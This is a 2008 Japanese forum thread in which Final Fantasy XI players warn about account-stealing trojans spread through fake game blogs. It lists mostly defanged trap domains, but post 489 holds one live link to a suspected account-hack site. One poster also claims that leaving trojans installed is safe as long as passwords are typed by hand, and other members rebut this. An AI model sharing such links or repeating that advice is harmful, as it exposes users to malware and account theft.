475 :既にその名前は使われています:2008/03/19(水) 01:20:59.08 ID:gkpj0FAs
FFブログ見ない俺はネ実にあるアニメ関係でやられると困る
だいたいブログにアクセスしても拒否されてはいれねえよ

476 :既にその名前は使われています:2008/03/19(水) 01:26:51.68 ID:gkpj0FAs
ブログは見ない!で回避できそうだがネ実以外の板でurl張られたら無理そうだ・・


477 :既にその名前は使われています:2008/03/19(水) 01:40:23.64 ID:dDLu0P7f
「見ない」が回避策になると言うのなら
インターネット見ないかFFやめるが一番の回避策だな

478 :既にその名前は使われています:2008/03/19(水) 01:44:21.51 ID:gkpj0FAs
今ffを一生懸命やってる人ってなんでブログをみるんだろう
俺が現役のときはヴァナとネットの情報だけの2つで済んだんだが

479 :既にその名前は使われています:2008/03/19(水) 03:12:17.88 ID:ZyT7Q3ph
ジョブや選択肢が増えて自分と同じ環境でのデータが欲しいからブログさがすんじゃね?

480 :既にその名前は使われています:2008/03/19(水) 03:15:46.42 ID:AhgU4+61
ブログもネットの情報だと思うんだが

481 :既にその名前は使われています:2008/03/19(水) 03:27:41.08 ID:/oKd9Jzx
情報収集の意味あいよりもブログは
雑誌ならお便りコーナーとか、新聞なら投書欄的なものみたいな感じで
硬くなく、難しく考える事もなく、楽に読める娯楽の意味合いが強いんじゃないかな〜


482 :既にその名前は使われています:2008/03/19(水) 03:40:26.45 ID:4C++Lcq/
最近は攻略記事をブログ形式で載せてるところも多いからな
ぺってんなんかはその典型だろう

攻略のためにぐぐってもブログが先にヒットすることも多いし

483 :既にその名前は使われています:2008/03/19(水) 05:30:05.76 ID:WQ8w2b8e
だが、ブログは情報が偏り安い。
しかも、最近ブログ見てる人間のほとんどが情報イナゴ。
更新している人間に毎日催促。ネタがなくなると無かったかのように次のブログへ催促を続ける。
他人へ圧力かけ、自分の情報は出さないさまは、今の中国そっくりだからなー

484 :既にその名前は使われています:2008/03/19(水) 05:32:55.87 ID:XCtqSLgJ
ハンゲームに昨日トロイがトップページにあったもんな
恐ろしいことじゃ

485 :既にその名前は使われています:2008/03/19(水) 05:35:57.31 ID:XCtqSLgJ
仏・クシュネール首相
「北京五輪の開会式ボイコットを欧州連合で検討するべき」

486 :既にその名前は使われています:2008/03/19(水) 05:37:27.44 ID:XCtqSLgJ
総務省が内閣府と検討中のネット犯罪への刑罰強化

最大罰金3000万w

はやくやってくれw

487 :既にその名前は使われています:2008/03/19(水) 05:52:13.60 ID:GWpVl/Sx
正直垢ハックが出てくるまでは、業者とかどうでもいいとか思ってたわ、一応真っ当に稼いでるし、そんなに迷惑もかかってなかったし
でもこりゃないわなぁ、変なツールに仕込むわけでもなく、一般の普通のユーザーを騙そうとして、しかも被害にあった垢はエクレアもわざわざ捨てられて

マジ死ねよ

488 :既にその名前は使われています:2008/03/19(水) 07:31:57.81 ID:xRNC8NSu
FFXI系のFC2ブログの偽装。
blog20fc2■com/ff11diary/
iframeは既出のinfosueek(略)。

489 :既にその名前は使われています:2008/03/19(水) 07:49:59.56 ID:6VAv5s/v
298 名前:既にその名前は使われています New! 投稿日:2008/03/18(火) 20:17:36.99 ID:+o5NgyEK
http://maplestorfy.w16.okwit.com/holy_immortals/

FF11PhotoRoom.html嬉しい
点は、マクロがサーバにバックUPでき



これ垢ハック?
踏んじゃったよ

490 :既にその名前は使われています:2008/03/19(水) 07:51:18.31 ID:xRNC8NSu
直リンすんなカス
自分が踏んじゃったから他の人も踏んじゃえみたいに思ってるのか貴様は

491 :既にその名前は使われています:2008/03/19(水) 07:52:56.96 ID:BCrnDDNT
>>489
消えろ、糞ッたれ垢ハッカーが

492 :既にその名前は使われています:2008/03/19(水) 07:59:01.61 ID:gBs2pyma
>>489
とりあえず市ね

493 :既にその名前は使われています:2008/03/19(水) 08:02:15.63 ID:nSTR6R50
専用ブラつかっていようが、自分がクリックしなければ開かないんだから
そこはもう自己責任だろうと思うんだが。
記事の内容みたら、安易にクリックしていいものかどうかぐらい判断できるだろう?

494 :既にその名前は使われています:2008/03/19(水) 08:12:24.58 ID:gBs2pyma
>>493
そういう事じゃないだろ
貼った方に責任がないような言い方すんじゃね〜よ

危険なURLかもしれないと思ったのに何故他の人が
踏まないよう配慮できないのですか?って話だよ
直リン避けるのもそれが危険なURLかどうかも
ちょっとスレ読んだらわかることだろ。
踏ませるために貼ってるとしか思えない。

495 :既にその名前は使われています:2008/03/19(水) 08:17:09.09 ID:xRNC8NSu
Safari3.1正式版来てた。
ttp://www.apple.com/jp/news/2008/mar/18safari.html
ttp://www.apple.com/jp/safari/download/

Bonjourはよくわからんけど(UPnPみたいなもん?)外しておきましょう。

Firefox3より先に出るとは思わなかった。

496 :既にその名前は使われています:2008/03/19(水) 08:19:36.37 ID:6VAv5s/v
なんだこの餓鬼どもwww
ちゃんと怪しいサイトかもしれないと書いてるだろww
踏むなよww
馬鹿かよwwwwwww

日本語読めない子達か?wwwww
死ねよwwwwww

で、そこは垢ハックサイトなのかどうかはやくチェックしろカスwww

497 :既にその名前は使われています:2008/03/19(水) 08:20:55.72 ID:6VAv5s/v
>>494
おめーが馬鹿なだけwwwwww

この書き込みで踏むアホなんかお前だけだよwww

今すぐリアルで死ねwww

498 :既にその名前は使われています:2008/03/19(水) 08:22:08.06 ID:BCrnDDNT
なんだ荒らしか

499 :既にその名前は使われています:2008/03/19(水) 08:22:56.96 ID:xRNC8NSu
自分でアカハックかどうかの判断もできない餓鬼は引っ込んでろ

500 :既にその名前は使われています:2008/03/19(水) 08:32:53.31 ID:gBs2pyma
>>496
それが人に物を頼む態度か?
テンプレくらい読めや

>おめーが馬鹿なだけwwwwww
>この書き込みで踏むアホなんかお前だけだよwww
そっくりそのままお前に返すわ

501 :既にその名前は使われています:2008/03/19(水) 08:56:33.76 ID:xRNC8NSu
VistaSP1正式版
ttp://support.microsoft.com/kb/936330/
x86 ttp://www.microsoft.com/downloads/details.aspx?FamilyID=b0c7136d-5ebb-413b-89c9-cb3d06d12674&DisplayLang=ja
x64 ttp://www.microsoft.com/downloads/details.aspx?FamilyID=874a414b-32b2-41cc-bd8b-d71eda5ec07c&DisplayLang=ja

502 :既にその名前は使われています:2008/03/19(水) 10:40:43.44 ID:ZyT7Q3ph
とりあえずPeerGuardian2で中華とか弾くようにしたら?

503 :既にその名前は使われています:2008/03/19(水) 10:58:07.82 ID:5QJcK8OF
>>502
PG2はセキュリティソフトですか?


……って言い出すアホがいるからなぁ。

504 :既にその名前は使われています:2008/03/19(水) 11:26:30.61 ID:mSEmp+6V
まじめに聞いてるのにと思ったとか来るかと思ったら煽りか、ディアで氏ね>>489

505 :既にその名前は使われています:2008/03/19(水) 11:33:34.67 ID:CvOOVUGq
串も刺さずにウイルス貼りとな^^;

506 :既にその名前は使われています:2008/03/19(水) 11:57:27.05 ID:4C++Lcq/
まあここは上級者専用のスレじゃなくて注意喚起のためのスレなんだから
初心者には優しく被害者には塩を塗らずで行きましょう。
あ、煽りとウイルス貼りには厳しくておk

507 :既にその名前は使われています:2008/03/19(水) 13:23:36.48 ID:ZyT7Q3ph
うちの親父クラスになると目覚まし時計の止め方が判らなくて破壊するとか、
「クリックしてください」と書いてるところを躊躇なくクリックするからな。

508 :既にその名前は使われています:2008/03/19(水) 13:24:28.74 ID:mcxfacuC
オヤジさんテラ萌えw

509 :既にその名前は使われています:2008/03/19(水) 13:59:06.22 ID:CvOOVUGq
泣き止まないファービーを撲殺するオヤジとか
妄想しちまったじゃねーか^^

510 :既にその名前は使われています:2008/03/19(水) 14:00:55.05 ID:xRNC8NSu
オヤジ:「『クリックしてください』と書いてあるからクリックしたんだ!
 クリックしちゃだめなら『クリックしないでください』と書け!」

511 :既にその名前は使われています:2008/03/19(水) 14:03:27.28 ID:ZyT7Q3ph
>>510
まぁそんな感じに逆切れするから始末が悪い。
教えようとすると「詳しく教えろ」といい、詳しく教えると「おまえ、俺をバカにしてるのか!」とまた切れるので
親父のマシンはかなり起動遅いしウィルス蔓延してるだろうが俺はもうノータッチ。

512 :既にその名前は使われています:2008/03/19(水) 14:04:33.57 ID:ZyT7Q3ph
×「詳しく教えろ」
○「わかりやすくおしえろ」

513 :既にその名前は使われています:2008/03/19(水) 14:06:07.89 ID:P1Cu3rKv
何度も書くが、ライセンスもう一個買って仮想環境を手に入れろ。
それだけでほぼ安泰だ。
VMwarePlayerは無料で使える、メモリさえつんどけば動作も快適だ。
もう一台のネット用PCなんて必要ない。

514 :既にその名前は使われています:2008/03/19(水) 14:07:16.46 ID:xRNC8NSu
>>511
そういうのに限って上司な件

515 :既にその名前は使われています:2008/03/19(水) 14:42:06.81 ID:xoE/imAb
>>339
まず大前提としてパスワードを保存しない設定が必須。
(つまり起動時に自動的にログインする、という設定を外す)
その上で金曜夜にパスワードを毎週変更するのが吉。
これでトロイ仕込まれていても無問題。
おれはトロイを5種類くらい飼ったままにしてるが(w)
これで垢ハックはされなくなった。
(ちなみにこの方策をとるまでにこの3週間で2回垢ハック経験ありw)

ただしキーロガータイプには無効。

516 :既にその名前は使われています:2008/03/19(水) 14:44:34.21 ID:mSEmp+6V
>>515
いや、そんなの自慢げに語られましても

517 :既にその名前は使われています:2008/03/19(水) 14:45:28.55 ID:xoE/imAb
>>401
現在流行しているトロイタイプの垢ハックツールに対抗するためには
パス変えるだけでは全く無意味。
なぜなら、パスワード設定ファイルそのものを盗んでいくから。
対策をとるなら、
パス変更に加え、パスワードを保存しない設定にしておくべき。
(つまり毎回毎回手入力でパスワードを入力してログインする)

518 :既にその名前は使われています:2008/03/19(水) 14:51:43.79 ID:XcxvyX+6
>>515
削除しろよw

519 :既にその名前は使われています:2008/03/19(水) 14:55:25.60 ID:4C++Lcq/
やはり業者さんでしょうか?
自称ハック被害者の割にセキュリティに関して反省の欠片も見受けられませんね。
トロイを仕掛けられた状態で金曜夜にパス変更をしたら、パスを盗まれた上で
サポセンが閉まって最悪の状態になりそうですが。
ローカル保存をしないことでトロイ対策ができるというのなら、
キーロガー対策はどうなさるおつもりで?

520 :既にその名前は使われています:2008/03/19(水) 14:55:33.82 ID:+nhvIHJl
>>515
他人の趣味にケチつけるつもりはないんだが、
FF以外の情報は大丈夫なのか?w

521 :既にその名前は使われています:2008/03/19(水) 14:57:41.50 ID:ZyT7Q3ph
>>515
現在キーロガータイプが存在しない根拠クレ

522 :既にその名前は使われています:2008/03/19(水) 15:01:29.53 ID:xoE/imAb
>>519
>>521
だって、セキュリティいっさい無しで
FF関連のブログに無防備にアクセスしまくって
その結果トロイに感染しまくってるんだが、
その結果垢ハックされまくっていたのが、
パスワード手入力するようにしただけで
さっぱり垢ハックされなくなったから。

>>520
あ、ちなみにFF以外の仕事やプライベートは全部Macで
やってるから、心配ないよ。

523 :既にその名前は使われています:2008/03/19(水) 15:03:34.47 ID:IoWVz6V+
いつものMac君か。
もう相手にしないほうがいい

524 :既にその名前は使われています:2008/03/19(水) 15:04:47.59 ID:xoE/imAb
いや、だから俺が言いたいのは、
・Windows Updateで最新版にする
・アンチウイルスソフトを常に最新の状態に保っておく
など
>>1-20あたりに書いてある対策も重要だが、
もっと手軽で確実にアカウント情報を守れる方法がある、
と言いたいわけ。
別に>>1-20あたりの対策を蔑視しているわけじゃないし、
時間ができたらやるつもりなんだけど、
それまでの時間稼ぎとして
「パスワード毎回手入力」は有効な方法、ってことがいいたいの。

525 :既にその名前は使われています:2008/03/19(水) 15:06:09.62 ID:ZyT7Q3ph
>>522
根拠としては弱いな。
不特定多数へのロガーは手間かかるから簡易にパスひっこぬくワームが多いとは思うが
とりあえず誰かに迷惑かけるかもしれないので4匹飼ってる^^とか言ってないでワーム処分しとけ。

526 :既にその名前は使われています:2008/03/19(水) 15:06:52.30 ID:xoE/imAb
>>525
すみません。明日仕事休みなのでさっそくワーム処分やっておきますw

527 :既にその名前は使われています:2008/03/19(水) 15:26:48.06 ID:/Cgd0cyC
おまいら優しすぎwいつものMacなんてスルーでいいじゃん。
ワーム飼うという感覚の馬鹿野郎だぜ?こんなの相手にするなよ。

俺らは情報共有と真に困ってる奴への助言&適切な板への誘導だろう?

528 :既にその名前は使われています:2008/03/19(水) 15:27:20.58 ID:ksC/8yuJ
やっぱりキーロガー型のがめんどいから少ないのかねぇ

毎度入力しますか

529 :既にその名前は使われています:2008/03/19(水) 16:06:31.08 ID:XnAXB3B2
なんかいつも「PS2ならだいじょうぶ!」という輩がいるので貼っとくか

Spyware.AcePasswdSnif は、ローカルエリアネットワークを介したユーザーパスワードを監視し
キャプチャする、スパイウェアプログラムです。
ttp://www.symantec.com/ja/jp/business/security_response/writeup.jsp?docid=2008-030312-0133-99

簡単に言うと、同じルータに繋がってるPCがこれに感染するとパス抜かれる可能性がある。


530 :既にその名前は使われています:2008/03/19(水) 16:29:10.95 ID:D81n/fz/
業者スレ立てしたみたいだから注意な


いつも参考にさせていただいております。
tp://live27.2ch.net/test/read.cgi/ogame/1205906152/

531 :既にその名前は使われています:2008/03/19(水) 16:40:36.67 ID:+nhvIHJl
>>529
まったく詳しくないんだが、
これって、Windowsのユーザ、パスワードを盗むスパイウェアじゃないの?
PS2のDNAS認証時にIDとパスを盗むとかもするのか?

532 :既にその名前は使われています:2008/03/19(水) 16:43:36.94 ID:xoE/imAb
>>530
試しに踏んでみたら、
JS/Agent.CGってやつに感染しますたw
明日削除しときますね。

533 :既にその名前は使われています:2008/03/19(水) 16:45:59.71 ID:/Cgd0cyC
>>529
それはWinPC向けのウェアじゃないの?
PS2のパスワード設定ファイルには意味ないと思うのだが?

具体的にPS2の設定プログラムとデータ送信ファイルに、そのウェアが脅威なのか提示してくれ。
PS2の仕様分からないとかは勘弁なw

534 :既にその名前は使われています:2008/03/19(水) 16:51:11.52 ID:/Cgd0cyC
>>532
そのスレ踏むだけで感染するの?
17のレス有るが..

535 :既にその名前は使われています:2008/03/19(水) 16:52:42.86 ID:isX3uPK5
>>1にURLがはられてる。infosueek

536 :既にその名前は使われています:2008/03/19(水) 16:56:24.39 ID:/Cgd0cyC
>>535
スレ1に貼ってるURL群のことなんだね。てっきり新手法が来たと焦ったよ。
しかし、よくURL踏めるなw

537 :既にその名前は使われています:2008/03/19(水) 17:02:59.92 ID:xRNC8NSu
はてなダイアリーの罠(?)ブログ
d.hatena■ne■jp/Uncool/
ま、これ自体は踏んでも無害。
はてなはiframeが使えないためか中華罠サイトへのリンクのみなので
危険性はwikiやbbs(2chなど)に爆撃される罠リンクなどと変わらん。
しかもzip直なので、わざわざ解凍して実行するようなボンクラは
正直言って擁護できんがとりあえず。今から通報先探す。

538 :既にその名前は使われています:2008/03/19(水) 17:03:29.82 ID:xoE/imAb
てか約1名だけ、俺のことをセキュリティ面で疎い、
と考えているヤツがいるようだが、
勘違いしないでほしい。
なぜ、おれがFF(とエロゲw)以外の全てのことについて
Macを使っているのかを考えてみろ。
ようするにおまえらよりセキュリティ観念が高いからなのだよ。
そもそもMac使えば感染しないのに、そして
Macを使う、という選択肢も残されているのに、
なんでおまえらはわざわざWindowsを使うのか。
なんでわざわざウイルスまみれの汚い世界に住んでいるのか。
セキュリティのことをどうこういうやつらが
Windowsを使っていること自体がおかしいと個人的には思う。

少なくとも俺は>>527よりかはセキュリティ観念は高いと思ってる。

539 :既にその名前は使われています:2008/03/19(水) 17:06:05.73 ID:mSEmp+6V
>>538
今更どんな言い訳しようが>>515で台無し

540 :既にその名前は使われています:2008/03/19(水) 17:12:51.91 ID:8zs4ixT3
新mac板ではxoE/imAbなヤツが来ると
“またバカが沸いたw”ってやられます

541 :既にその名前は使われています:2008/03/19(水) 17:15:52.81 ID:WQ8w2b8e
>>538
まー落ち着け。
「その」一名は何時もの
「罠サイト踏む奴は自衛出来てない馬鹿。泣き寝入りしろ」
って言ってる業者だろーから、ほっとけ。
ま、でも余りに多く、毎日ID変えて「罠サイトふ(ry」って目に付く事やってきたら、投稿で自衛しないといけないかもだけどなー

542 :既にその名前は使われています:2008/03/19(水) 17:18:14.68 ID:xRNC8NSu
>>537 に貼られられている885以外に886と887がある
(885と886は11日製造、887は17日製造)。
新しい887をスキャンしてみた。
ttp://www.virustotal.com/analisis/674dc160e17d0938d76e34db07ea2899
ほぼ検知するようだ。
こんなの見逃すのはよっぽどクs…ノートン…orz

543 :既にその名前は使われています:2008/03/19(水) 17:29:03.89 ID:Uom24yZp
FFやってるPCでトロイもらってノホホンとしてるのか、強い子だな。
Windowsは>>538にとってはゲーム機かもしれんが、そうでもない人も居るわけで。

極論いえば、サイキョウのセキュリティはLAN接続をしないとかくだらない路線にいくんで
Macうんぬん、FF専用PCなどはあまり実用性が無いキガスル。

とまあ、スレ見る度不安になるんだがうちのフリーで固めたセキュリティソフト
AVGfree
Comodo pfw
spybot
あんまりブログとか見ないんだが、最近ウィルス反応はまったくないなァ。
だといっても自信があるわけでもないので、危険そうなURIには触れないようにしてるんだが・・。

544 :既にその名前は使われています:2008/03/19(水) 17:29:18.26 ID:WQ8w2b8e
てか、今日はたんぱつwがやたらと多いな…
携帯からかけてるにわかセキュ房(おばはんwwww)は自重汁。
一度だけの被害を体験として協力押し付けられても質問者が困るだけだぞwwwww
寂しさだけでここにこられても、帰って混乱産むだけだからマジ自重汁。

545 :既にその名前は使われています:2008/03/19(水) 17:33:04.78 ID:xoE/imAb
>>543
別に100%のセキュリティを求めることは期待してない。
100%を求めるならそれこそおまえがいうように
LANケーブルをぶったぎるしかない罠。
そんな極論を言っているわけじゃなくて、
現実的にMacにするだけでセキュリティは高まるっていってんの。
Mac使ったことないならどんだけクリーンな環境なのか知らんのかな。
おれはMacのセキュリティが万全と言ってるわけじゃないよ?
Macの環境はクリーンだと言ってるわけ。意味分かる?

546 :既にその名前は使われています:2008/03/19(水) 17:37:19.87 ID:IoWVz6V+
>皮先とは、
皮先はAV機器板で強度の芝厨のMacerの荒し。自称、熊本住在で小児科のヤブ医者。
自スレやMac板などでは、 皮先くん ◆N3i.Qu1SoY の小手半を使う。
小手半を出さないだけで、皮先は初心者スレにほぼ毎日来ている。
時間帯は、12〜14 16〜18 19〜20 23〜02時 位が多い。
小手半を出さなくても、用語と文体・主張内容からほぼ推定できる。


前スレにいたID自爆した自称被害者だろ、今のこの人。
最後まで喋っていたほうが勝ちだとか思ってるタイプだからスルーするに限る

547 :既にその名前は使われています:2008/03/19(水) 17:38:51.10 ID:+nhvIHJl
なんかMacのCMみたいだな。俺様理論の一方的な押し付けっぽくてw

548 :既にその名前は使われています:2008/03/19(水) 17:38:55.99 ID:ZyT7Q3ph
マックからの漏洩はなかったとしてもHDDは共有なわけだから仮想Windowsを起動した際そこからMacデータ流出はありえるんじゃね?
Trojanとかならどんな自己アップデートがくるかわからんぞ。

549 :既にその名前は使われています:2008/03/19(水) 17:39:26.83 ID:ZyT7Q3ph
>>547
あのCMはイメージダウンだったよな…

550 :既にその名前は使われています:2008/03/19(水) 17:40:28.95 ID:xoE/imAb
>>549
それがヤツのねらいだろ。

551 :既にその名前は使われています:2008/03/19(水) 17:43:43.28 ID:mSEmp+6V
どんだけ力説しても、マシンにトロイあるまま放置してたり、踏みにいって感染する時点で
説得力0

552 :既にその名前は使われています:2008/03/19(水) 17:44:10.63 ID:+nhvIHJl
前はMac頑張れよ!!って思ってたのに、CM見て嫌いになったんだよなぁ

553 :既にその名前は使われています:2008/03/19(水) 17:45:38.57 ID:Uom24yZp
>>545
MacやFF専用PCはたしかに安全かもしれんが
Windowsでもそのセキュリティやユーザーの意識を高める必要があるでしょってこと。
別に否定してるわけじゃない、あるものを有効にまず使うべきだってこと。

みんながみんなMacやFF専用PCもってりゃいいけど、そうでもないでしょ。
Windowsだって気をつけて使えば良いわけだし。
君もこの機会にWindowsのセキュリティ向上してみたら。

554 :既にその名前は使われています:2008/03/19(水) 17:45:41.24 ID:xRNC8NSu
んなとのためにウン十万出してMacとMac用アプリを買い揃えて
Macの作法を学習するくらいなら
ルータとFWとアンチウイルスソフトを揃えたり
VirtualPCみたいな仮想環境を構築したほうが手軽だわ。

なんつーかね、年をとると別なOSとか覚える気になれんのよ。
MacでいいならLinuxでもいいわけだし。

555 :既にその名前は使われています:2008/03/19(水) 17:49:01.71 ID:L3sI9EuA
そうやって俺たちをMac嫌いにさせるのが皮先のねらいってことに
そろそろ気づけよ・・・。>>41

556 :既にその名前は使われています:2008/03/19(水) 18:02:40.36 ID:Z7oRlvw3
ちょっと聞きたいことがあるんだが・・・
自宅から接続してる時は特に問題ないんだが、
友達の家から接続するとやたらPG2が中国IP弾いてるんだが、これ感染してるのかな・・?
ノートPC持ち歩いてるから友達のPCを使って接続してるわけじゃないし・・・
どーなってるのorz

557 :既にその名前は使われています:2008/03/19(水) 18:06:42.03 ID:Zrqn8L/0
>>556
他の情報がないからうんともすんとも。
その友達がサーバ立ててるとか、ファイル交換ソフトを使ってるとか・・・

558 :既にその名前は使われています:2008/03/19(水) 18:07:26.60 ID:nDGPkPPd
糞ワロタw

559 :既にその名前は使われています:2008/03/19(水) 18:11:17.11 ID:Z7oRlvw3
>>556
サーバ立てたりファイル交換ソフトも使ってないみたいなんだ。

カスペルスキーのオンラインスキャンをインストールしてた時にもやたら中国IP弾いてて、
そこからネット見てない時もPG2が反応するようになったんだけど・・・


560 :既にその名前は使われています:2008/03/19(水) 18:29:45.16 ID:4C++Lcq/
>>559
ファームウェアの更新でつないでるのかもしれない
DVDドライブとかに台湾製の部品使ってないか?

561 :既にその名前は使われています:2008/03/19(水) 18:42:26.53 ID:Z7oRlvw3
>>560
うーん・・・それが原因なんだろうか・・・
でも以前はこんなこと一度も無かったんですよね。
いきなりこんなことになってもう訳が分からずorz

とりあえず、友達にそこらへんのこと聞いてみます。
ありがとうございました_(._.)_


562 :既にその名前は使われています:2008/03/19(水) 18:54:47.01 ID:qfze3d38
>>538
MacもWinもつかってるけど、セキュリティ対策面じゃ、Macの方がレベル低いと思うぞ。
ユーザー数が少なくて、攻撃対象にされにくいからWinより被害でにくいだけだろ。

「攻撃対象にされにくいものを使う」ってのもセキュリティ対策ではあるけど、
いったん、攻撃対象にされれば、もろいわな。
Macを使うことがセキュリティ観念が高いことになるってとこには、同意できんわ┐(´д`)┌

563 :既にその名前は使われています:2008/03/19(水) 18:55:56.21 ID:JF4yIkjL
あまりPCに詳しくないのですが、PeerGuardian2を導入してみました。
そのあとPOLに接続しようとしたらブロックされるので
手動で許可する、を選択しても次から次へとブロックされてしまうのですが
これはなにが悪いのでしょうか(´Д⊂

564 :既にその名前は使われています:2008/03/19(水) 18:58:54.11 ID:tHEtlt2e
>>536
導入時にテンプレにあるサイトとかは読んだかな?
とりあえず設定方法とか間違ってないか確認してから、
間違ってなかったらウイルス感染を疑うべき。

565 :既にその名前は使われています:2008/03/19(水) 18:59:43.70 ID:tHEtlt2e
すごく、マチガエマシタ。
>>564>>563へのレス。

566 :既にその名前は使われています:2008/03/19(水) 19:00:19.80 ID:ZyT7Q3ph
>>563
俺のPG2はデフォルトでPOLブロックしなかったぞ。

567 :既にその名前は使われています:2008/03/19(水) 19:01:09.55 ID:BCrnDDNT
>>562
Macを使う事で俺は被害者にならない、なら同意出来るんじゃね?w

568 :既にその名前は使われています:2008/03/19(水) 19:04:53.50 ID:JF4yIkjL
563です。

Spybotを走らせてみたのですが、異常は検知されなかった状態です。

PG2はそれから、一応マニュアルみながら設定して、PG2のリネージュのHPから
台湾や中国系のIPをはじくようにした所です。
>>デフォルトでPOLブロックしなかった
はじかないのが普通なんですね。
あーどこがいけないのかなぁ。もう一度読み直してきます・・orz

569 :既にその名前は使われています:2008/03/19(水) 19:09:29.39 ID:ZyT7Q3ph
>>568
そこ読んでるなら、インスコするときに手順載ってるから読み飛ばさずに手順どおりやればいけるはず。

570 :既にその名前は使われています:2008/03/19(水) 19:14:09.43 ID:qfze3d38
>>563
初回起動時のリスト選択で、P2Pのチェックを外さなかったと思われ・・・。
PG2開いて、保護タブのリスト管理で、説明にP2Pって書いてあるやつのチェック外せばおk。



571 :既にその名前は使われています:2008/03/19(水) 19:20:35.00 ID:o61P5z79
>>563
なん手動でやってもブロックが次々にされるかというと、
スクウェアが使ってるIPアドレスは一個ではなく範囲で存在するから。
IPアドレスを、検索サイトで表示させれば範囲で出てくるからそれを
ルールとして許可リスト作ればオッケー
まぁ上にあるようにP2Pのチェック外すのが一番簡単。
あまりPCに詳しくないならそれでもいいと思う。

572 :既にその名前は使われています:2008/03/19(水) 19:21:05.61 ID:JF4yIkjL
>>570

563です。

>>P2Pのチェックを外さなかったと思われ・・・。

ドンピシャです! 外したらログインできるようになりました。
ありがとうございます!
P2Pってはずすべきだったのですねorz 


573 :既にその名前は使われています:2008/03/19(水) 19:25:17.79 ID:qfze3d38
>>567
同意できんわ。

「Macを使う事で俺は被害者にならない」なんて、
セキュリティ観念としては最低だは(´・д・`)

574 :既にその名前は使われています:2008/03/19(水) 19:26:20.41 ID:JF4yIkjL
>>571
>>上にあるようにP2Pのチェック外すのが一番簡単。
>>あまりPCに詳しくないならそれでもいいと思う。

はい・・・決して詳しくないので、チェックは外しておきます。
ありがとうございます。


575 :既にその名前は使われています:2008/03/19(水) 22:19:12.52 ID:nCW9WaQ/
浮上

576 :既にその名前は使われています:2008/03/19(水) 22:46:00.01 ID:nCW9WaQ/
もう150まで落ちた

577 :既にその名前は使われています:2008/03/19(水) 23:02:29.48 ID:RZa5VtPo
ODN規制 No. 2
http://qb5.2ch.net/test/read.cgi/sec2ch/1200145532/16
\.odn.(ad|ne).jp (全サーバ規制) ※6回め ●永久規制

業者が罠サイト張りまくりで永久規制ですし

また中国からの書き込みあるかもしれないんで、見つけたら試しにBooもよろしく
逆引きできないIPなら焼けたはず〜

串迎撃部隊@2ch掲示板 -- Boo2008 --
http://boo.2ch.net/

578 :既にその名前は使われています:2008/03/19(水) 23:04:27.61 ID:ZyT7Q3ph
業者的にはODM規制されたところで別の基地経由で書き込めばいいわけだしなぁ・・・
業者迷惑

579 :既にその名前は使われています:2008/03/19(水) 23:12:35.11 ID:j6dnDuvy
福建中華の罠ドメインを見つけたんで気をつけてくれよな!

Domain name: livedoor-bbs■com
Registrant Contact:
fly bg
bugao fei
05972809666 fax: 13605909415
fujianlongyan
longyan Fujian 364000
cn
Created: 2008-03-18


580 :既にその名前は使われています:2008/03/19(水) 23:25:48.60 ID:Ao95Yyk2
age

581 :既にその名前は使われています:2008/03/19(水) 23:39:44.41 ID:kCexloZI
>>579
ドメインネームと発信地だけ書いてくれると
見やすくてありがたい。
fujian longyan(福建省竜岩)の時点で黒だよな。

582 :既にその名前は使われています:2008/03/20(木) 00:30:29.02 ID:OnDejMT/
FFプレイしてて他は何もしていないはずの時間に
Taiwan 210.201.139.91
China 58.227.193.190

が同時刻に連続して3回づつブロックされてた
IPでぐぐってもこれといって情報なし

とりあえずカスペでオンラインスキャンした後spybotとAVGで今チェックしてるけど
こういうケースは初めてなのでドキドキだ・・・

583 :既にその名前は使われています:2008/03/20(木) 00:30:36.83 ID:Y/s5aQ5y
【FF11】カンパニエ将軍集
文字がぼやけてしまったので、詳しく知りたい人は FF11Wikiを見るという事で一つ何とか。
ff11dawda●blog●drecom●jp/
58.22.255.67

中身をのぞいたら記事が特徴あるものだったので文字列で検索したところ
FC2のブログのコピペでした
ブログ主に教えてあげたい気もするのですがFC2のブログを閲覧する勇気は
ありませんでしたよ。
ところで上にもでてた、IEに代わるサファリ?というブラウザは使われた方
いますか?

584 :既にその名前は使われています:2008/03/20(木) 00:42:20.79 ID:W6rfV4sK
>>582
aguseでは China 58.227.193.190 はバ韓国(ソウル)って出るね
しかも管理者情報の一部が文字化けのせいなのかぐちゃぐちゃだし

585 :既にその名前は使われています:2008/03/20(木) 00:47:33.93 ID:OnDejMT/
ひとまず何も検出されなかったけど
なぜブロックしてたのか原因がわからないと不安になりますね
しばらくフレに財産預けておこうかなあ・・・

586 :既にその名前は使われています:2008/03/20(木) 01:34:23.30 ID:b6mh7+a7
ノートンってそんなに駄目なのか?
ノートン入れてるし大丈夫だろうと普通にブログ見まくってたけど不安になってきた

587 :既にその名前は使われています:2008/03/20(木) 02:49:08.39 ID:mzVwwhZt
ノートンはどっちかというとアンインスコ時のしぶとさに定評があるというか悪評があるね
とりあえずFF関係でネットサーフィンするならPG2も併用するよろし

588 :既にその名前は使われています:2008/03/20(木) 04:45:28.71 ID:fbUC1hEa
>>586
アドオンパック入れて、パスワードの一部かPOLIDの一部を登録して
不意に送信されそうになったとき警告&ブロックされるようにしてる
・・・がこれでいいかは不安w

589 :既にその名前は使われています:2008/03/20(木) 04:50:30.57 ID:ze+Z3M4L
>>588
それはブラウザから送信されるデータを監視する機能だと思う
だとすれば、パス抜きマルウェアはブラウザを使うことなく
独自にデータを送信するから残念ながら流出はブロックされない

590 :既にその名前は使われています:2008/03/20(木) 05:02:00.69 ID:fbUC1hEa
>>589
ブラウザ以外ではメッセンジャーとメールのプロトコル?は検知するようだ
でも独自アプリのスパイウェアを考えると効果は薄そうだ・・・
ブラウザで罠スクリプト呼ばれたときは効くから無いよりはいいが

591 :既にその名前は使われています:2008/03/20(木) 05:05:54.72 ID:ze+Z3M4L
>>590
残念だけど、罠スクリプトには効果ないよ

592 :既にその名前は使われています:2008/03/20(木) 05:27:35.74 ID:fbUC1hEa
>>591
そうか、、、なんか別の対策も考えてみよう
ありがとね

593 :既にその名前は使われています:2008/03/20(木) 05:56:41.66 ID:bZqdq9WU
>>585
勝手な予想だけど、
過去に見た業者のWEBサイト等にアクセスログが残ってて、
業者がログにあるIPアドレスに、無差別にアクセスしようとしてるだけ
じゃないかね。
それで、アクセスしたPCにセキュリティホールがあれば、何か仕込むとかする。
なので、ウィルスに感染してなくても >>582 みたいなことは起こると思う。

動的IPの場合には、IP変われば、とりあえず問題ないけど、
固定IPの場合は、業者があきらめるまで狙われるから、今後も
ブロックするようにしていたほうが、安全だと思う。

